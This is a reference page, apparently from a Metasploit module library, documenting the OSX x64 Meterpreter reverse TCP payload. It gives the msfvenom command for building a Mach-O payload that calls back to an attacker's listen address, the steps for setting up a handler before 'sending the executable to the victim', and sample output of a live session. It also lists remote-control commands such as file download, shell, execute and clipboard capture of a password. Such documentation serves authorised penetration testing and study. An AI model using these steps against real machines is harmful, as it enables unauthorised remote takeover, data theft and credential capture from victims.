OSX Meterpreter, Reverse TCP Stager - Metasploit


This page contains detailed information about how to use the payload/osx/x64/meterpreter/reverse_tcp metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: OSX Meterpreter, Reverse TCP Stager
Module: payload/osx/x64/meterpreter/reverse_tcp
Source code: modules/payloads/stagers/osx/x64/reverse_tcp.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): x64
Supported platform(s): OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: -

Inject the mettle server payload (staged). Connect, read length, read buffer, execute

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use payload/osx/x64/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options
    ... show and set options ...
msf payload(reverse_tcp) > generate

To learn how to generate payload/osx/x64/meterpreter/reverse_tcp with msfvenom, please read this.

Required Options

  • LHOST: The listen address (an interface may be specified)

Knowledge Base

osx/x64/meterpreter_reverse_tcp is similar to the linux meterpreter, but built for OSX. It allows you to remotely take over the compromised system, having control of the file system, webcam, microphone, screenshot and collect sensitive information such as credentials using post modules, etc.

Vulnerable Application

osx/x64/meterpreter_reverse_tcp 64-bit MacOSX platforms from 10.8 onwards.

Deploying osx/x64/meterpreter_reverse_tcp

To use osx/x64/meterpreter_reverse_tcp as an executable, first you can generate it with msfvenom:

./msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=[IP] LPORT=4444 -f macho -o /tmp/payload.bin

Before sending the executable to the victim machine, you need to set up the handler on your end:

  1. Start msfconsole
  2. Do: use exploit/multi/handler
  3. Do: set PAYLOAD osx/x64/meterpreter_reverse_tcp
  4. Do: set LHOST [Your IP]
  5. Do: run

And that should start the listener. When the victim runs the malicious executable, you should receive a session:

msf exploit(handler) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.23.1:4444 
msf exploit(handler) > [*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.182:45009) at 2017-08-08 12:34:49 +0800

msf exploit(handler) > sessions 1
[*] Starting interaction with 1...

meterpreter >

Important Basic Commands

Here is a list of some of the common commands you might need while using Meterpreter:

pwd

The pwd command tells you the current working directory. For example:

meterpreter > pwd
/Users/User/Desktop

cd

The cd command allows you to change directories. Example:

meterpreter > cd /tmp

cat

The cat command allows you to see the content of a file:

meterpreter > cat /tmp/data.txt
hello world

upload

The upload command allows you to upload a file to the remote target. For example:

meterpreter > upload /tmp/data.bin /Users/User/Desktop
[*] uploading  : /tmp/data.bin -> /Users/User/Desktop
[*] uploaded   : /tmp/data.bin -> /Users/User/Desktop/data.bin
meterpreter >

download

The download command allows you to download a file from the remote target to your machine. For example:

meterpreter > download /Users/User/Desktop/data.bin /tmp
[*] downloading: /Users/User/Desktop/data.bin -> /tmp/data.bin
[*] download   : /Users/User/Desktop/data.bin -> /tmp/data.bin

ifconfig/ipconfig

ifconfig and ipconfig are actually the same thing. They allow you to see the network interfaces on the remote machine.

getuid

The getuid command tells you the current user that Meterpreter is running on. For example:

meterpreter > getuid
Server username: uid=502, gid=20, euid=502, egid=20

execute

The execute command allows you to execute a command or file on the remote machine. For example:

meterpreter > execute -f echo -a "hello > /tmp/hello.txt"
Process 5292 created.

ps

The ps command lists the running processes on the remote machine.

shell

The shell command allows you to interact with the remote machine's terminal (or shell). For example:

meterpreter > shell
Process 29335 created.
Channel 2 created.
cat /tmp/hello.txt
hello
exit
meterpreter >

If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel or [CTRL]+[Z] then y (or the exit command) to terminate the channel.

sysinfo

The sysinfo command shows you basic information about the remote machine. Such as:

  • Computer name
  • OS name
  • Architecture
  • Meterpreter type

For example:

meterpreter > sysinfo
Computer     : My-Computer.local
OS           : Mac OS X Sierra (MacOSX 10.12.6)
Architecture : x86
Meterpreter  : x64/osx
meterpreter >

Extensions

OSX Meterpreter supports reading and writing to the clipboard with the extapi extension, you can load it with the load command:

meterpreter > load extapi
Loading extension extapi...Success.
meterpreter > clipboard_get_data
Text captured at
=================
pa$$w0rd
=================

Other commands

For a complete list of OSX Meterpreter commands, do the following at the prompt:

meterpreter > help

Go back to menu.

Msfconsole Usage

Here is how the osx/x64/meterpreter/reverse_tcp payload looks in the msfconsole:

msf6 > use payload/osx/x64/meterpreter/reverse_tcp

msf6 payload(osx/x64/meterpreter/reverse_tcp) > show info

       Name: OSX Meterpreter, Reverse TCP Stager
     Module: payload/osx/x64/meterpreter/reverse_tcp
   Platform: OSX
       Arch: x64
Needs Admin: No
 Total size: 168
       Rank: Normal

Provided by:
  parchedmind
  nologic
  timwr
  nemo <[email protected]>

Basic options:
Name                   Current Setting  Required  Description
----                   ---------------  --------  -----------
LHOST                                   yes       The listen address (an interface may be specified)
LPORT                  4444             yes       The listen port
MeterpreterDebugLevel  0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)

Description:
  Inject the mettle server payload (staged). Connect, read length, 
  read buffer, execute

Module Options

This is a complete list of options available in the osx/x64/meterpreter/reverse_tcp payload:

msf6 payload(osx/x64/meterpreter/reverse_tcp) > show options

Module options (payload/osx/x64/meterpreter/reverse_tcp):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   LHOST                                   yes       The listen address (an interface may be specified)
   LPORT                  4444             yes       The listen port
   MeterpreterDebugLevel  0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)

Advanced Options

Here is a complete list of advanced options supported by the osx/x64/meterpreter/reverse_tcp payload:

msf6 payload(osx/x64/meterpreter/reverse_tcp) > show advanced

Module advanced options (payload/osx/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • parchedmind
  • nologic
  • timwr
  • nemo <nemo[at]felinemenace.org>

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.